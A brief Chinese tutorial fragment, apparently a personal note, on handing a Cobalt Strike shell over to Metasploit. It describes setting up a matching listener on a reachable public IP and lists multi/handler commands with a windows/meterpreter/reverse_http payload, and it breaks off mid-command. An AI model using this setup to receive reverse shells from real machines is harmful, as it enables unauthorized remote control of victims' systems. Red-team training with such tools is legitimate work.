Cs的shell反弹到msf
参考资料:https://blog.csdn.net/Zlirving_/article/details/113862910
先建立监听器
先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip
Msf:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set